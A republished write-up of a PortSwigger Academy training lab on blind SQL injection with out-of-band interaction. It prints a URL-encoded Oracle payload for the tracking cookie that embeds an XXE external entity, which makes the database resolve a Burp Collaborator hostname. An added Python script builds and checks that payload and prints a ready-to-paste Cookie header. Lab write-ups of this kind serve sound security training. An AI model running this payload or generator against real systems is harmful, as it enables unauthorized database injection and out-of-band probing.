Lab: Blind SQL injection with out-of-band interaction: blind injection via out-of-band interaction (unfinished write-up)
Posted by Zeker62
Preface: this article was compiled by the editors of cha138.com and covers the lab "Blind SQL injection with out-of-band interaction" (unfinished write-up); we hope it is of some reference value.
Lab description:
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain.
To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.
Note:
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems.
To solve the lab, you must use Burp Collaborator’s default public server (burpcollaborator.net).
Solution
- Use an XXE payload inside the injection. The query runs asynchronously, so nothing about the response changes; the only signal you get is the DNS lookup the database performs when it resolves the external entity. The technique is Oracle-specific (EXTRACTVALUE, xmltype and FROM dual are Oracle constructs) and depends on the database server's XML parser resolving external entities. For example, you can combine SQL injection with basic XXE techniques as follows (replace the x's with your own Collaborator subdomain, and send the value in the TrackingId cookie):
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//xxxxxxxxxxxxxxxxxxxxxxxxxxx.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
Then poll the Burp Collaborator client: a DNS interaction for your subdomain confirms the injection fired and solves the lab.
This is fairly involved; readers are advised to look up some tutorials (for example via Baidu) to follow along.
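The encoded payload above is hard to read, and a typo in it silently breaks the lookup, since the response never changes. The following Python, added here as an example and not part of the original post or of PortSwigger's material, builds the raw Oracle SQL fragment, applies the same "key characters only" URL encoding the payload uses (space, ?, =, %, :, ;), decodes it back so you can see what the database actually receives, and pulls the hostname out of the SYSTEM literal as a pre-flight check. The Collaborator hostname is the placeholder from the post, and the comment describing the server-side query (`WHERE TrackingId = '...'`) is an assumption about the lab, not something the page states.

```python
"""Build, encode and decode the Oracle XXE-based out-of-band SQLi payload
from the write-up above. Added example, not code from the original post."""
import re
import urllib.parse

# Placeholder exactly as written in the post; substitute your Collaborator subdomain.
COLLAB_PLACEHOLDER = "xxxxxxxxxxxxxxxxxxxxxxxxxxx.burpcollaborator.net"

# Burp-style "key characters" URL encoding: only characters that would break a
# cookie value or a URL query are encoded. Because the mapping is applied per
# character in a single pass, '%' is escaped once and never double-encoded.
KEY_CHARS = {"%": "%25", " ": "+", "?": "%3f", "=": "%3d", ":": "%3a", ";": "%3b"}


def build_oracle_xxe_sqli(collab_host: str) -> str:
    """Return the raw SQL fragment to place in the TrackingId cookie.

    Assumption (not stated on the page): the back end runs something like
    `... WHERE TrackingId = '<value>'`. `x'` closes that string literal,
    UNION SELECT runs EXTRACTVALUE over an xmltype whose DTD declares an
    external parameter entity on our host, and Oracle resolves that entity
    while parsing. Resolving it requires a DNS lookup of collab_host, which
    happens even if the outbound HTTP fetch itself is blocked. The XPath
    '/l' is arbitrary; only the DTD resolution matters.
    """
    dtd = ('<?xml version="1.0" encoding="UTF-8"?>'
           '<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://' + collab_host + '/"> %remote;]>')
    return "x' UNION SELECT EXTRACTVALUE(xmltype('" + dtd + "'),'/l') FROM dual--"


def encode_key_chars(raw: str) -> str:
    """Encode only the characters the cheat-sheet payload encodes (space ? = % : ;)."""
    return "".join(KEY_CHARS.get(c, c) for c in raw)


def decode_cookie_value(encoded: str) -> str:
    """Reverse the encoding to see the SQL the database actually receives."""
    return urllib.parse.unquote_plus(encoded)


def cookie_header(collab_host: str) -> str:
    """Full Cookie header line to paste into the intercepted request."""
    return "Cookie: TrackingId=" + encode_key_chars(build_oracle_xxe_sqli(collab_host))


def extract_oob_host(encoded_or_raw: str) -> str:
    """Pull the hostname out of the SYSTEM literal, to check before sending that
    the entity really points at your Collaborator domain (returns '' if absent)."""
    sql = decode_cookie_value(encoded_or_raw)
    m = re.search(r'SYSTEM\s+"https?://([^/"]+)/?"', sql)
    return m.group(1) if m else ""


# The exact encoded value shown in the post, kept here to check the round trip.
PAGE_PAYLOAD = (
    "x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f>"
    "<!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+\"http%3a//"
    + COLLAB_PLACEHOLDER
    + "/\">+%25remote%3b]>'),'/l')+FROM+dual--"
)

if __name__ == "__main__":
    print(cookie_header(COLLAB_PLACEHOLDER))
    print(decode_cookie_value(PAGE_PAYLOAD))
    print("entity host:", extract_oob_host(PAGE_PAYLOAD))
```

Swap `COLLAB_PLACEHOLDER` for the subdomain your Collaborator client hands you, paste the printed header into the intercepted request in Repeater, then poll the client. The decoded view is the thing to stare at when nothing arrives: an unbalanced quote or a stray encoded character in the DTD means the xmltype parse fails before the entity is ever resolved, and because the query is asynchronous the application gives you no error to go on.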